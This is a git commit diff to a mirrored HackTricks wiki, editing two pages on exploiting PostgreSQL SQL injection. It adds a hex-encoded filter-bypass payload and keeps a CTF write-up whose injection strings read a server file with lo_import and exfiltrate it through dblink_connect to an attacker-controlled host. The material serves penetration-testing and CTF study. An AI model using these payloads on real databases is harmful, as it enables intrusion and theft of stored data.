mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-15 01:17:36 +00:00
GitBook: [#3465] No subject
This commit is contained in:
parent
150c997029
commit
af75f82bc4
2 changed files with 20 additions and 15 deletions
|
@ -16,14 +16,12 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
****
|
||||
***
|
||||
|
||||
**This page aims to explain different tricks that could help you to exploit a SQLinjection found in a postgresql database and to compliment the tricks you can find on** [**https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md**](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/PostgreSQL%20Injection.md)
|
||||
|
||||
|
@ -35,7 +33,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
### **Exfiltration example using dblink and large objects**
|
||||
|
||||
You can [**read this example**](dblink-lo\_import-data-exfiltration.md) to see a CTF example of\*\* how to load data inside large objects and then exfiltrate the content of large objects inside the username\*\* of the function `dblink_connect`.
|
||||
You can [**read this example**](dblink-lo\_import-data-exfiltration.md) to see a CTF example of **how to load data inside large objects and then exfiltrate the content of large objects inside the username** of the function `dblink_connect`.
|
||||
|
||||
## PL/pgSQL password bruteforce
|
||||
|
||||
|
@ -156,6 +154,19 @@ This function will dump the whole database in XML format in just 1 row (be caref
|
|||
SELECT database_to_xml(true,true,'');
|
||||
```
|
||||
|
||||
### Strings in Hex
|
||||
|
||||
If you can run **queries** passing them **inside a string** (for example using the **`query_to_xml`** function). **You can use the convert\_from to pass the string as hex and bypass filters this way:**
|
||||
|
||||
{% code overflow="wrap" %}
|
||||
```sql
|
||||
select encode('select cast(string_agg(table_name, '','') as int) from information_schema.tables', 'hex'), convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573', 'UTF8');
|
||||
|
||||
# Bypass via stacked queries + error based + query_to_xml with hex
|
||||
';query_to_xml(convert_from('\x73656c656374206361737428737472696e675f616767287461626c655f6e616d652c20272c272920617320696e74292066726f6d20696e666f726d6174696f6e5f736368656d612e7461626c6573','UTF8'))-- -
|
||||
```
|
||||
{% endcode %}
|
||||
|
||||
### Forbidden quotes
|
||||
|
||||
If cannot use quotes for your payload you could bypass this with `CHR` for basic clauses (_character concatenation only works for basic queries such as SELECT, INSERT, DELETE, etc. It does not work for all SQL statements_):
|
||||
|
@ -172,12 +183,10 @@ SELECT $$hacktricks$$;
|
|||
SELECT $TAG$hacktricks$TAG$;
|
||||
```
|
||||
|
||||
{% hint style="danger" %}
|
||||
<img src="../../../.gitbook/assets/i3.png" alt="" data-size="original">\
|
||||
**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**!
|
||||
|
||||
{% embed url="https://go.intigriti.com/hacktricks" %}
|
||||
{% endhint %}
|
||||
|
||||
<details>
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# dblink/lo\_import data exfiltration
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,10 +16,9 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
|
||||
**This is an example of how to exfiltrate data loading files in the database with `lo_import` and exfiltrate them using `dblink_connect`.**
|
||||
|
||||
# **Preparing the exfiltration server/**Asynchronous SQL Injection
|
||||
## Preparing the exfiltration server/Asynchronous SQL Injection
|
||||
|
||||
**Extracted from:** [**https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md**](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
|
||||
|
||||
|
@ -116,11 +115,11 @@ asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT COUNT(*) F
|
|||
|
||||
It looks like it only has one empty table in the current schema and the flag is not in the database. We may really need to exfiltrate data from `/var/lib/postgresql/data/secret`. Unfortunately, if we try to use `pg_read_file` or `pg_read_binary_file` to read the file, we will not get an incoming connection so that the current user may not have permission to use these functions.
|
||||
|
||||
### More info of asynchronous SQLInjection with postdresql
|
||||
#### More info of asynchronous SQLInjection with postdresql
|
||||
|
||||
* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
|
||||
|
||||
# **Exfiltrating large object contents**
|
||||
## **Exfiltrating large object contents**
|
||||
|
||||
It's possible to read file using large objects ([https://www.postgresql.org/docs/11/lo-funcs.html](https://www.postgresql.org/docs/11/lo-funcs.html)). We can use `lo_import` to load the contents of the file into the `pg_largeobject` catalog. If the query is success, we will get the object's `oid`.
|
||||
|
||||
|
@ -176,12 +175,11 @@ To load the flag:
|
|||
asd' UNION SELECT 1,(SELECT dblink_connect('host=IP user=' || (SELECT convert_from(lo_get(16444), 'UTF8')) || ' password=postgres dbname=p
|
||||
```
|
||||
|
||||
### More info of oid:
|
||||
#### More info of oid:
|
||||
|
||||
* [https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module](https://balsn.tw/ctf\_writeup/20190603-facebookctf/#hr\_admin\_module)
|
||||
* [https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md](https://github.com/PDKT-Team/ctf/blob/master/fbctf2019/hr-admin-module/README.md)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -197,5 +195,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
Loading…
Reference in a new issue